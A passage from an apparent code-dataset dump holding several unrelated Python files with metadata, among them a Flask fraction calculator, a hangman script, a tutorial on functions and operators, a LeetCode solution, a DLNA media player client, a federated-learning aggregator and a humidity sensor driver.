'w') as jsonFile:\n json.dump(parameter_dict, jsonFile)\n\nnp.savetxt(results_path/'loss_data', loss_data, delimiter = ',')\n\n#plotting\nplt.clf()\nplt.scatter(range(parameter_dict['epochs']), loss_data)\nplt.savefig(results_dir + '/' + parameter_dict['filename'] +'/'+'loss_plot.png')\n","sub_path":"cleverrx_bot/scripts/pair_training_launcher.py","file_name":"pair_training_launcher.py","file_ext":"py","file_size_in_byte":4353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"407118366","text":"from flask import Flask, request\nfrom fractions import Fraction\n\napp = Flask(__name__)\n\n\ndef take_inputs():\n if request.method == 'POST':\n value1 = request.values.get('A', default=0, type=str)\n else:\n value1 = request.args.get('A', default=0, type=str)\n try:\n value1 = Fraction(value1)\n except ZeroDivisionError:\n return \"A's denominator shouldn't be zero! \\n\"\n except ValueError:\n return \"A's value should be a number (includes fraction, float, integer). \\n\"\n if request.method == 'GET':\n value2 = request.args.get('B', default=0, type=str)\n else:\n value2 = request.values.get('B', default=0, type=str)\n try:\n value2 = Fraction(value2)\n except ZeroDivisionError:\n return \"B's denominator shouldn't be zero! \\n\"\n except ValueError:\n return \"B's value should be a number (includes fraction, float, integer). \\n\"\n return value1, value2 \n\n\n@app.route('/', methods=['POST', 'GET'])\ndef index():\n return 'Usage;\\n<Operation>?A=<Value1>&B=<Value2>\\n'\n\n@app.route('/add', methods=['POST','GET'])\ndef addition():\n try:\n value1, value2 = take_inputs()\n result = value1 + value2\n except ValueError:\n warning_msg = take_inputs()\n return warning_msg\n else:\n if float(result).is_integer():\n result = int(result)\n return '%d \\n' % result\n return '%.3f \\n' % result\n\n\n@app.route('/sub', methods=['POST', 'GET'])\ndef subtraction():\n try:\n value1, value2 = take_inputs()\n result = value1 - value2\n except ValueError:\n warning_msg = take_inputs()\n return warning_msg\n else:\n if float(result).is_integer():\n result = int(result)\n return '%d \\n' % result\n return '%.3f \\n' % result\n\n\n@app.route('/mul', methods=['POST', 'GET'])\ndef multiplication():\n try:\n value1, value2 = take_inputs()\n result = value1 * value2\n except ValueError:\n warning_msg = take_inputs()\n return warning_msg\n else:\n if float(result).is_integer():\n result = int(result)\n return '%d \\n' % result\n return '%.3f \\n' % result\n\n\n@app.route('/div', methods=['POST', 'GET'])\ndef division():\n try:\n value1, value2 = take_inputs()\n try:\n result = ((value1)/(value2))\n except ZeroDivisionError:\n warning_msg = \"B's value shouldn't be zero! \\n\"\n return warning_msg\n except ValueError:\n warning_msg = take_inputs()\n return warning_msg\n else:\n if float(result).is_integer():\n result = int(result)\n return '%d \\n' % result\n return '%.3f \\n' % result\n\n\nif __name__ == \"__main __\":\n app.run()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"274748726","text":"import os\r\nimport random\r\n\r\ndef choose_word_list():\r\n file_names = os.listdir(\"data\")\r\n category_position = 0\r\n for f in enumerate(file_names):\r\n file = \"data/\" + file_names[category_position]\r\n with open(file, 'r') as f:\r\n lines = f.read().splitlines()\r\n first_category = lines[0]\r\n print(str(int(category_position) +1) + \") \" + str(first_category))\r\n category_position += 1\r\n \r\n \r\n \r\n\r\n choice = input(\"which one? \")\r\n choice = int(choice)-1\r\n\r\n file = \"data/\" + file_names[choice]\r\n\r\n with open(file, 'r') as f:\r\n lines = f.read().splitlines()\r\n\r\n #print(lines)\r\n\r\n category = lines[0]\r\n puzzle = random.choice(lines[1:])\r\n\r\n print(category)\r\n print(puzzle)\r\nchoose_word_list()\r\n","sub_path":"hangman/more_file_io.py","file_name":"more_file_io.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"606219033","text":"import numpy as np\r\n\r\ndef preprocessing_function(x):\r\n return x / 255.\r\n\r\ninput_config = {\r\n 'target_size': (224, 224),\r\n 'color_mode': 'RGB',\r\n 'im_framework': 'opencv',\r\n 'reference_image': 247. * np.ones((1, 224, 224, 3))\r\n}\r\n\r\ncustom_objects = None\r\n\r\nclass_map = {0: 'Normal', 1: 'Pneumonia'}","sub_path":"Imaging/backup/pneumonia_config.py","file_name":"pneumonia_config.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"647588787","text":"from datetime import datetime\nimport os\nimport resource\nimport sys\n\n# CONSTANTS\n__VERSION__ = \"0.0.1\"\n__NAME__ = \"Spardaqus\"\nROOT_DIR = os.path.dirname(os.path.abspath(__file__))\nEXITONERROR = True\nRSS_MEMORY_BASE = resource.getrusage(resource.RUSAGE_SELF).ru_maxrss\nRSS_MEMORY_DIVISOR = 1024.0 if sys.platform == \"darwin\" else 1.0 if sys.platform == \"linux\" else 1.0\nPYSPARK_REQUIRED_PACKAGES = \"org.apache.spark:spark-sql-kafka-0-10_2.11:2.4.4 \" \\\n \"pyspark-shell \"\nSPARK_REQUIRED_EXTRACLASS = \"kafka-clients-0.10.0.1.jar\"\n\n# Dynamically changed by the system; don't mess with these\nLOGGER = None\nMAX_RSS_MEMORY_USED = 0.0\nLAST_RSS_MEMORY_USED = 0.0\nSETTINGS_CACHE = {}\nCACHED_SETTINGS = {}\nKILLSIG = False\n\n# Adjustable if you know what you are doing\nMAX_SPLUNK_BATCH_SIZE = 100000000\nSPLUNK_BATCH_SIZE = 1\n","sub_path":"spardaqus/globals.py","file_name":"globals.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"188752942","text":"# Function Without Argument\r\n\r\ndef Function1():\r\n print('My Name Is Bhavy Jilka')\r\n\r\n\r\nFunction1()\r\nFunction1()\r\n\r\n\r\n# Function With Argument\r\n\r\ndef Function2(name):\r\n print('Name is :', name)\r\n\r\n\r\nFunction2('Bhavy Jilka')\r\n\r\n\r\n# Example With Return Statement\r\n\r\ndef Function3(a):\r\n return a\r\n\r\n\r\na = Function3('Bhavy Jilka')\r\nprint(a)\r\n\r\n\r\n# Example With Multiple Return Statement\r\n\r\ndef Function4():\r\n name1 = 'Bhavy Jilka'\r\n contact = 9724462078\r\n return name1, contact\r\n\r\n\r\nname1, contact = Function4()\r\nprint('Name :', name1)\r\nprint('Contact :', contact)\r\n\r\n\r\n# Default Arguments Example\r\n\r\ndef ex(b=10, c=20):\r\n print(b + c)\r\n\r\n\r\nex(30, 50)\r\nex()\r\n\r\n\r\n# Keyword Arguments\r\n\r\ndef ex1(x, y):\r\n print('Sum Is :', x + y)\r\n\r\nex1(y=50, x=30)\r\n\r\n\r\n# Variable Length Arguments\r\n\r\ndef add(*number):\r\n sum = 0\r\n\r\n for n in number:\r\n sum = sum + n\r\n print(\"Sum :\", sum)\r\n\r\nadd(10, 30)\r\nadd(10, 30, 50)\r\n\r\n#Example With Keyword Arguments\r\n\r\ndef func(**arg):\r\n for i,j in arg.items():\r\n print(i,j)\r\n\r\nfunc(Name ='Bhavy',Lastname = 'Jilka')\r\n\r\n#Scope Of Variables\r\n\r\ndef Function5():\r\n v=10\r\n print('Value Inside Function :',v)\r\n\r\nz=15\r\nFunction5()\r\nprint('Value Outside Function :',z)\r\n\r\n#Modules In Python\r\n\r\nimport mymodule\r\n\r\nname =mymodule. bj[\"name\"]\r\nprint(name)\r\n\r\n#Arithmetic Operator\r\n\r\nm=10\r\nn=7\r\n\r\nprint('M+N : ',m+n)\r\nprint('M-N : ',m-n)\r\nprint('M*N : ',m*n)\r\nprint('M/N : ',m/n)\r\nprint('M//N : ',m//n)\r\nprint('M**N : ',m**n)\r\n\r\n#Comparison Operators\r\n\r\nd = 20\r\ne = 12\r\n\r\nprint('d > e is ', d > e )\r\nprint('d < e is ', d < e )\r\nprint('d == e is ', d == e )\r\nprint('d != e is ', d != e )\r\nprint('d >= e is ', d >= e )\r\nprint('d <= e is ', d <= e )\r\n\r\n#Logical Operators\r\n\r\n#Example of And\r\na1=10\r\na2=20\r\na3=30\r\n\r\nif a1>a2 and a1>a3:\r\n print('A1 is the largest number.')\r\nif a2>a1 and a2>a3:\r\n print('A2 is largest number.')\r\nif a3>a1 and a3>a2:\r\n print('A3 is largest number.')\r\n\r\n#Example Of Or\r\n\r\nch = input(\"Enter a character : \")\r\n\r\nif(ch=='A' or ch=='a' or ch=='e' or ch=='E' or ch=='i' or ch=='I' or ch=='o' or ch=='O' or ch=='u' or ch=='U'):\r\n print(ch,'Is a Vowel')\r\nelse:\r\n print(ch,'Is a consonant')\r\n\r\n#membership operators\r\n\r\nb1=10\r\nb2=7\r\nlist2=[10,20,30,40,50]\r\n\r\nprint(b1 in list2)\r\nprint(b2 in list2)\r\nprint(b2 not in list2)\r\n\r\n#Identity Operators\r\nc1=20\r\nc2=20\r\n\r\nprint(c1 is c2)\r\nprint(c1 is not c2)","sub_path":"taskk4.py","file_name":"taskk4.py","file_ext":"py","file_size_in_byte":2391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"472046622","text":"# title: sum-of-distances-in-tree\n# detail: https://leetcode.com/submissions/detail/408925711/\n# datetime: Thu Oct 15 13:03:59 2020\n# runtime: 400 ms\n# memory: 25.8 MB\n\nclass Solution:\n def sumOfDistancesInTree(self, N: int, edges: List[List[int]]) -> List[int]:\n g = collections.defaultdict(list)\n for i, j in edges:\n g[i].append(j)\n g[j].append(i)\n \n def dfs(i, parent):\n children = g[i]\n cnt, dist = 1, 0\n for j, child in enumerate(children):\n if child == parent:\n children[j] = None\n continue\n cnt1, dist1 = dfs(child, i)\n children[j] = [child, cnt1, dist1 + cnt1]\n cnt += cnt1\n dist += dist1 + cnt1\n children.append([-1, cnt, dist])\n return cnt, dist\n \n def dfs2(i, p_cnt, p_dist):\n children = g[i]\n i_cnt, i_dist = children[-1][1], children[-1][2]\n result[i] = i_dist + p_dist + p_cnt\n for j, child in enumerate(children):\n if child is None or child[0] == -1:\n continue\n c_cnt = p_cnt + i_cnt - child[1]\n c_dist = p_dist + p_cnt + i_dist - child[2]\n dfs2(child[0], c_cnt, c_dist)\n \n root = 0 \n # root = random.randint(0, N - 1)\n dfs(root, -1)\n result = [0] * N\n dfs2(root, 0, 0)\n return result","sub_path":"leetcode/sum-of-distances-in-tree/408925711.py","file_name":"408925711.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"650788853","text":"#!/usr/bin/python\n\n# @file dlnap.py\n# @author cherezov.pavel@gmail.com\n# @brief Python over the network media player to playback on DLNA UPnP devices.\n\n# Change log:\n# 0.1 initial version.\n# 0.2 device renamed to DlnapDevice; DLNAPlayer is disappeared.\n# 0.3 debug output is added. Extract location url fixed.\n# 0.4 compatible discover mode added.\n# 0.5 xml parser introduced for device descriptions\n# 0.6 xpath introduced to navigate over xml dictionary\n# 0.7 device ip argument introduced\n# 0.8 debug output is replaced with standard logging\n\n__version__ = \"0.8\"\n\nimport re\nimport sys\nimport time\nimport socket\nimport select\nimport logging\nimport traceback\nfrom contextlib import contextmanager\n\nimport os\n\npy3 = sys.version_info[0] == 3\nif py3:\n from urllib.request import urlopen\nelse:\n from urllib2 import urlopen\n\nSSDP_GROUP = (\"239.255.255.250\", 1900)\nURN_AVTransport = \"urn:schemas-upnp-org:service:AVTransport:1\"\nSSDP_ALL = \"ssdp:all\"\n\ndef _get_port(location):\n \"\"\" Extract port number from url.\n\n location -- string like http://anyurl:port/whatever/path\n return -- port number\n \"\"\"\n port = re.findall('http://.*?:(\\d+).*', location)\n return int(port[0]) if port else 80\n\ndef _get_tag_value(x, i = 0):\n \"\"\" Get the nearest to 'i' position xml tag name.\n\n x -- xml string\n i -- position to start searching tag from\n return -- (tag, value) pair.\n e.g\n <d>\n <e>value4</e>\n </d>\n result is ('d', '<e>value4</e>')\n \"\"\"\n x = x.strip()\n value = ''\n tag = ''\n\n # skip <? > tag\n if x[i:].startswith('<?'):\n i += 2\n while i < len(x) and x[i] != '<':\n i += 1\n\n # check for empty tag like '</tag>'\n if x[i:].startswith('</'):\n i += 2\n in_attr = False\n while i < len(x) and x[i] != '>':\n if x[i] == ' ':\n in_attr = True\n if not in_attr:\n tag += x[i]\n i += 1\n return (tag, '', x[i+1:])\n\n # not an xml, treat like a value\n if not x[i:].startswith('<'):\n return ('', x[i:], '')\n\n i += 1 # <\n\n # read first open tag\n in_attr = False\n while i < len(x) and x[i] != '>':\n # get rid of attributes\n if x[i] == ' ':\n in_attr = True\n if not in_attr:\n tag += x[i]\n i += 1\n\n i += 1 # >\n\n while i < len(x):\n value += x[i]\n if x[i] == '>' and value.endswith('</' + tag + '>'):\n # Note: will not work with xml like <a> <a></a> </a>\n close_tag_len = len(tag) + 2 # />\n value = value[:-close_tag_len]\n break\n i += 1\n return (tag, value[:-1], x[i+1:])\n\ndef _xml2dict(s):\n \"\"\" Convert xml to dictionary.\n\n <?xml version=\"1.0\"?>\n <a any_tag=\"tag value\">\n <b> <bb>value1</bb> </b>\n <b> <bb>value2</bb> </b>\n </c>\n <d>\n <e>value4</e>\n </d>\n <g>value</g>\n </a>\n\n =>\n\n { 'a':\n {\n 'b': [ {'bb':value1}, {'bb':value2} ],\n 'c': [],\n 'd':\n {\n 'e': [value4]\n },\n 'g': [value]\n }\n }\n \"\"\"\n d = {}\n while s:\n tag, value, s = _get_tag_value(s)\n value = value.strip()\n isXml, dummy, dummy2 = _get_tag_value(value)\n if tag not in d:\n d[tag] = []\n if not isXml:\n if not value:\n continue\n d[tag].append(value.strip())\n else:\n if tag not in d:\n d[tag] = []\n d[tag].append(_xml2dict(value))\n return d\n\ns = \"\"\"\n <?xml version=\"1.0\"?>\n <a any_tag=\"tag value\">\n <b><bb>value1</bb></b>\n <b><bb>value2</bb> <v>value3</v></b>\n </c>\n <d>\n <e>value4</e>\n </d>\n <g>value</g>\n </a>\n\"\"\"\n\ndef _xpath(d, path):\n \"\"\" Return value from xml dictionary at path.\n\n d -- xml dictionary\n path -- string path like root/device/serviceList/service@serviceType=URN_AVTransport/controlURL\n return -- value at path or None if path not found\n \"\"\"\n\n for p in path.split('/'):\n tag_attr = p.split('@')\n tag = tag_attr[0]\n if tag not in d:\n return None\n\n attr = tag_attr[1] if len(tag_attr) > 1 else ''\n if attr:\n a, aval = attr.split('=')\n for s in d[tag]:\n if s[a] == [aval]:\n d = s\n break\n else:\n d = d[tag][0]\n return d\n\ndef _get_control_url(xml):\n \"\"\" Extract AVTransport contol url from device description xml\n\n xml -- device description xml\n return -- control url or empty string if wasn't found\n \"\"\"\n return _xpath(xml, 'root/device/serviceList/service@serviceType={}/controlURL'.format(URN_AVTransport))\n\n@contextmanager\ndef _send_udp(to, payload):\n \"\"\" Send UDP message to group\n\n to -- (host, port) group to send to payload to\n payload -- message to send\n \"\"\"\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)\n sock.sendto(payload.encode(), to)\n yield sock\n sock.close()\n\ndef _send_tcp(to, payload):\n \"\"\" Send TCP message to group\n\n to -- (host, port) group to send to payload to\n payload -- message to send\n \"\"\"\n try:\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.connect(to)\n sock.sendall(payload.encode())\n finally:\n sock.close()\n\ndef _get_location_url(raw):\n \"\"\" Extract device description url from discovery response\n\n raw -- raw discovery response\n return -- location url string\n \"\"\"\n for d in raw.split('\\r\\n'):\n if d.lower().startswith('location:'):\n return re.findall('location:\\s*(.*)\\s*', d, re.I)[0]\n return ''\n\ndef _get_friendly_name(xml):\n \"\"\" Extract device name from description xml\n\n xml -- device description xml\n return -- device name\n \"\"\"\n return _xpath(xml, 'root/device/friendlyName')\n\nclass DlnapDevice:\n \"\"\" Represents DLNA/UPnP device.\n \"\"\"\n\n def __init__(self, raw, ip):\n self.__logger = logging.getLogger(self.__class__.__name__)\n self.__logger.info('=> New DlnapDevice (ip = {}) initialization..'.format(ip))\n\n self.__raw = raw.decode()\n self.ip = ip\n self.port = None\n self.control_url = None\n self.name = 'Unknown'\n self.has_av_transport = False\n\n try:\n self.location = _get_location_url(self.__raw)\n self.__logger.info('location: {}'.format(self.location))\n\n self.port = _get_port(self.location)\n self.__logger.info('port: {}'.format(self.port))\n\n raw_desc_xml = urlopen(self.location).read().decode()\n\n self.__desc_xml = _xml2dict(raw_desc_xml)\n self.__logger.debug('description xml: {}'.format(self.__desc_xml))\n\n self.name = _get_friendly_name(self.__desc_xml)\n self.__logger.info('friendlyName: {}'.format(self.name))\n\n self.control_url = _get_control_url(self.__desc_xml)\n self.__logger.info('control_url: {}'.format(self.control_url))\n\n self.has_av_transport = self.control_url is not None\n self.__logger.info('=> Initialization completed'.format(ip))\n except Exception as e:\n self.__logger.warning('DlnapDevice (ip = {}) init exception:\\n{}'.format(ip, traceback.format_exc()))\n\n def __repr__(self):\n return '{} @ {}'.format(self.name, self.ip)\n\n def __eq__(self, d):\n return self.name == d.name and self.ip == d.ip\n\n def _create_packet(self, action, payload):\n \"\"\" Create packet to send to device control url.\n\n action -- control action\n payload -- xml to send to device\n \"\"\"\n header = \"\\r\\n\".join([\n 'POST {} HTTP/1.1'.format(self.control_url),\n 'User-Agent: {}/{}'.format(__file__, __version__),\n 'Accept: */*',\n 'Content-Type: text/xml; charset=\"utf-8\"',\n 'HOST: {}:{}'.format(self.ip, self.port),\n 'Content-Length: {}'.format(len(payload)),\n 'SOAPACTION: \"{}#{}\"'.format(URN_AVTransport, action),\n 'Connection: close',\n '',\n payload,\n ])\n\n return header\n\n def set_current(self, url, instance_id = 0):\n \"\"\" Set media to playback.\n\n url -- media url\n instance_id -- device instance id\n \"\"\"\n payload = \"\"\"<?xml version=\"1.0\" encoding=\"utf-8\"?>\n <s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n <s:Body>\n <u:SetAVTransportURI xmlns:u=\"{}\">\n <InstanceID>{}</InstanceID>\n <CurrentURI>{}</CurrentURI>\n <CurrentURIMetaData />\n </u:SetAVTransportURI>\n </s:Body>\n </s:Envelope>\"\"\".format(URN_AVTransport, instance_id, url)\n\n packet = self._create_packet('SetAVTransportURI', payload)\n _send_tcp((self.ip, self.port), packet)\n\n def play(self, instance_id=0):\n \"\"\" Play media that was already set as current.\n\n instance_id -- device instance id\n \"\"\"\n payload = \"\"\"<?xml version=\"1.0\" encoding=\"utf-8\"?>\n <s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n <s:Body>\n <u:Play xmlns:u=\"{}\">\n <InstanceID>{}</InstanceID>\n <Speed>1</Speed>\n </u:Play>\n </s:Body>\n </s:Envelope>\"\"\".format(URN_AVTransport, instance_id)\n\n packet = self._create_packet('Play', payload)\n _send_tcp((self.ip, self.port), packet)\n\n def pause(self):\n pass\n\n def stop(self):\n pass\n\n def set_next(self, url):\n pass\n\n def next(self):\n pass\n\ndef discover(name = '', ip = '', timeout = 1, st = SSDP_ALL, mx = 3):\n \"\"\" Discover UPnP devices in the local network.\n\n name -- name or part of the name to filter devices\n timeout -- timeout to perform discover\n st -- st field of discovery packet\n mx -- mx field of discovery packet\n return -- list of DlnapDevice\n \"\"\"\n payload = \"\\r\\n\".join([\n 'M-SEARCH * HTTP/1.1',\n 'User-Agent: {}/{}'.format(__file__, __version__),\n 'HOST: {}:{}'.format(*SSDP_GROUP),\n 'Accept: */*',\n 'MAN: \"ssdp:discover\"',\n 'ST: {}'.format(st),\n 'MX: {}'.format(mx),\n '',\n ''])\n devices = []\n with _send_udp(SSDP_GROUP, payload) as sock:\n start = time.time()\n while True:\n if time.time() - start > timeout:\n # timed out\n break\n r, w, x = select.select([sock], [], [sock], 1)\n if sock in r:\n data, addr = sock.recvfrom(1024)\n if ip and addr[0] != ip:\n continue\n\n d = DlnapDevice(data, addr[0])\n if d not in devices:\n if not name or name.lower() in d.name.lower():\n devices.append(d)\n\n if ip:\n # no need in further searching by ip\n break\n elif sock in x:\n raise Exception('Getting response failed')\n else:\n # Nothing to read\n pass\n return devices\n\nif __name__ == '__main__':\n import getopt\n\n def usage():\n print('{} [--list] [--ip <device ip>] [-d[evice] <name>] [--all] [-t[imeout] <seconds>] [--play <url>]'.format(__file__))\n\n def version():\n print(__version__)\n\n try:\n opts, args = getopt.getopt(sys.argv[1:], \"hvd:t:i:\", ['help', 'version', 'log=', 'ip=', 'play=', 'pause', 'stop', 'list', 'device=', 'timeout=', 'all'])\n except getopt.GetoptError:\n usage()\n sys.exit(1)\n\n device = ''\n url = ''\n timeout = 0.5\n action = ''\n logLevel = logging.WARN\n compatibleOnly = True\n ip = ''\n for opt, arg in opts:\n if opt in ('-h', '--help'):\n usage()\n sys.exit(0)\n elif opt in ('-v', '--version'):\n version()\n sys.exit(0)\n elif opt in ('--log'):\n if arg.lower() == 'debug':\n logLevel = logging.DEBUG\n elif arg.lower() == 'info':\n logLevel = logging.INFO\n elif arg.lower() == 'warn':\n logLevel = logging.WARN\n elif opt in ('--all'):\n compatibleOnly = False\n elif opt in ('-d', '--device'):\n device = arg\n elif opt in ('-t', '--timeout'):\n timeout = float(arg)\n elif opt in ('-i', '--ip'):\n ip = arg\n compatibleOnly = False\n timeout = 10\n elif opt in ('--list'):\n action = 'list'\n elif opt in ('--play'):\n action = 'play'\n url = arg\n elif opt in ('--pause'):\n action = 'pause'\n elif opt in ('--stop'):\n action = 'stop'\n\n logging.basicConfig(level=logLevel)\n\n st = URN_AVTransport if compatibleOnly else SSDP_ALL\n allDevices = discover(name=device, ip=ip, timeout=timeout, st=st)\n if not allDevices:\n print('No compatible devices found.')\n sys.exit(1)\n\n if action in ('', 'list'):\n print('Discovered devices:')\n for d in allDevices:\n print(' {} {}'.format('[a]' if d.has_av_transport else '[x]', d))\n sys.exit(0)\n\n d = allDevices[0]\n print(d)\n if action == 'play':\n try:\n d.set_current(url=url)\n d.play()\n except Exception as e:\n print('Device is unable to play media.')\n logging.warn('Play exception:\\n{}'.format(traceback.format_exc()))\n sys.exit(1)\n elif action == 'pause':\n d.pause()\n elif action == 'stop':\n d.stop()\n","sub_path":"dlnap/dlnap.py","file_name":"dlnap.py","file_ext":"py","file_size_in_byte":13413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"641014195","text":"#\n# Copyright 2016 The BigDL Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nimport pickle\nimport logging\nimport threading\nfrom torch import nn\nimport torch\nfrom bigdl.ppml.fl.nn.utils import ndarray_map_to_tensor_map\nfrom bigdl.dllib.utils.log4Error import invalidInputError\nfrom threading import Condition\n\n\nclass Aggregator(object):\n def __init__(self,\n client_num=1) -> None:\n self.model = None\n self.client_data = {'train':{}, 'eval':{}, 'pred':{}}\n self.server_data = {'train':{}, 'eval':{}, 'pred':{}}\n self.client_num = client_num\n self.condition = Condition()\n self._lock = threading.Lock()\n logging.info(f\"Initialized Pytorch aggregator [client_num: {client_num}]\")\n\n\n def set_meta(self, loss_fn, optimizer):\n with self._lock:\n self.set_loss_fn(loss_fn)\n optimizer_cls = pickle.loads(optimizer.cls)\n optimizer_args = pickle.loads(optimizer.args)\n self.set_optimizer(optimizer_cls, optimizer_args)\n\n\n def set_loss_fn(self, loss_fn):\n self.loss_fn = loss_fn\n\n def set_optimizer(self, optimizer_cls, optimizer_args):\n if len(list(self.model.parameters())) == 0:\n self.optimizer = None\n return\n self.optimizer = optimizer_cls(self.model.parameters(), **optimizer_args)\n\n def put_client_data(self, client_id, data, phase):\n self.condition.acquire()\n self.client_data[phase][client_id] = data\n logging.debug(f'server receive data [{client_id}], \\\ngot {len(self.client_data[phase])}/{self.client_num}')\n \n if len(self.client_data[phase]) == self.client_num: \n logging.debug('server received all client data, start aggregate')\n self.aggregate(phase)\n logging.debug('clearing client data')\n self.client_data[phase] = {}\n self.condition.notify_all() \n else:\n logging.debug(f'[{client_id}] waiting')\n self.condition.wait()\n self.condition.release()\n\n\n def aggregate(self, phase):\n input, target = [], None\n # to record the order of tensors with client ID\n for cid, ndarray_map in self.client_data[phase].items():\n for k, v in ndarray_map.items():\n if k == 'input':\n input.append((cid, torch.from_numpy(v)))\n elif k == 'target':\n target = torch.from_numpy(v)\n else:\n invalidInputError(False,\n f'Invalid type of tensor map key: {k},'\n f' should be input/target')\n # input is a list of tensors\n\n # x = torch.stack(input)\n # x = torch.sum(x, dim=0)\n # x.requires_grad = True\n # pred = self.model(x)\n\n # sort the input tensor list in order to keep the order info of client ID\n def sort_by_key(kv_tuple):\n return kv_tuple[0]\n \n input.sort(key=sort_by_key)\n tensor_list = []\n for cid, input_tensor in input:\n input_tensor.requires_grad = True\n tensor_list.append(input_tensor)\n\n if phase == 'train':\n pred = self.model(tensor_list)\n loss = self.loss_fn(pred, target)\n if self.optimizer is not None:\n self.optimizer.zero_grad()\n loss.backward()\n if self.optimizer is not None:\n self.optimizer.step()\n\n for cid, input_tensor in input:\n grad_map = {'grad': input_tensor.grad.numpy(), 'loss': loss.detach().numpy()}\n self.server_data['train'][cid] = ndarray_map_to_tensor_map(grad_map)\n elif phase == 'eval':\n pass\n elif phase == 'pred':\n pred = self.model(tensor_list)\n for cid, input_tensor in input:\n pred_map = {'pred': pred.detach().numpy()}\n self.server_data['pred'][cid] = ndarray_map_to_tensor_map(pred_map)\n else:\n invalidInputError(False,\n f'Invalid phase: {phase}, should be train/eval/pred')\n","sub_path":"python/ppml/src/bigdl/ppml/fl/nn/pytorch/aggregator.py","file_name":"aggregator.py","file_ext":"py","file_size_in_byte":4702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"123827032","text":"# This program is distributed under Apache License Version 2.0\n#\n# © Albertas Mickenas, 2016\n# mic@wemakethings.net\n# albertas@technariumas.lt\n#\n\nimport time\n\nclass SHT2x:\n\ti2c = []\n\tADDR = 64\n\n\tPOLYNOMIAL = 0x131 # POLYNOMIAL x8 + x5 + x4 +1.\n\n\tCMD_READ_TEMPERATURE_hold = 0xE3\n\tCMD_READ_HUMIDITY_hold = 0xE5\n\n\tCMD_READ_TEMPERATURE = 0xF3\n\tCMD_READ_HUMIDITY = 0xF5\n\tCMD_READ_REGISTER = 0xE7\n\tCMD_WRITE_REGISTER = 0xE6\n\tCMD_RESET \t\t\t = 0xFE\n\n\tdef __init__(self, _i2c):\n\t\tself.i2c = _i2c\n\n\tdef CheckCRC(self, buf):\n\t\tPOLYNOMIAL = 0x131 # POLYNOMIAL x8 + x5 + x4 +1.\n\t\tcrc = 0\n\t\tfor i in range(2):\n\t\t\tcrc ^= buf[i]\n\t\t\tfor bit in range(8):\n\t\t\t\tif (crc & 0x80):\n\t\t\t\t\tcrc = (crc << 1) ^ POLYNOMIAL\n\t\t\t\telse:\n\t\t\t\t\tcrc = (crc << 1)\n\t\treturn crc\n\n\tdef toTemperature(self, buf):\n\t\tif buf == False:\n\t\t\tprint(\"CRC Error...\\r\\n\")\n\t\t\treturn False\n\t\telse:\n\t\t\treturn -46.85 + 175.72 * ((buf[0] << 8) + buf[1]) /2**16\n\n\tdef toHumidity(self, buf):\n\t\tif buf == False:\n\t\t\tprint(\"CRC Error...\\r\\n\")\n\t\t\treturn False\n\t\telse:\n\t\t\treturn -6 + 125.0 * ((buf[0] << 8) + buf[1]) / 2**16\n\n\tdef decodeUserReg(self, buf):\n\t\treg = buf[0]\n\t\tret = []\n\t\tif(0b10000001 & reg == 0b10000001):\n\t\t\tret.append(\"11bits\")\n\t\telif(0b10000001 & reg == 0b10000000):\n\t\t\tret.append(\"RH 10bit T 13bit\")\n\t\telif(0b10000001 & reg == 0b00000001):\n\t\t\tret.append(\"RH 8bit T 12bit\")\n\t\telif(0b10000001 & reg == 0b00000000):\n\t\t\tret.append(\"RH 12bit T 14bit\")\n\t\t\n\t\tif(0b01000000 & reg == 0b01000000):\n\t\t\tret.append(\"VDD < 2.5\")\n\t\telse:\n\t\t\tret.append(\"VDD > 2.5\")\n\n\t\tif(0b00000100 & reg == 0b00000100):\n\t\t\tret.append(\"heater ON\")\n\t\telse:\n\t\t\tret.append(\"heater OFF\")\n\n\t\tif(0b00000010 & reg == 0b00000010):\n\t\t\tret.append(\"OTP reload disabled\")\n\t\telse:\n\t\t\tret.append(\"OTP reload enabled\")\n\n\t\treturn ret\n\n\tdef runI2CCommand(self, command, bytesToRead):\n\t\tb = bytearray(1)\n\t\tb[0] = command\n\n\t\tself.i2c.writeto(self.ADDR, b)\n\n\t\tif(bytesToRead > 0):\n\t\t\trecv = bytearray(bytesToRead)\n\t\t\tretryCounter = 0\n\t\t\tdone = False\n\t\t\twhile retryCounter < 15 and not done:\n\t\t\t\ttry:\n\t\t\t\t\tself.i2c.readfrom_into(self.ADDR, recv)\n\t\t\t\t\tdone = True\n\t\t\t\t\tretryCounter = retryCounter + 1\t\t\t\t\n\t\t\t\texcept:\n\t\t\t\t\ttime.sleep(0.01)\n\t\t\t#print(hex(recv[0])+' '+hex(recv[1])+' 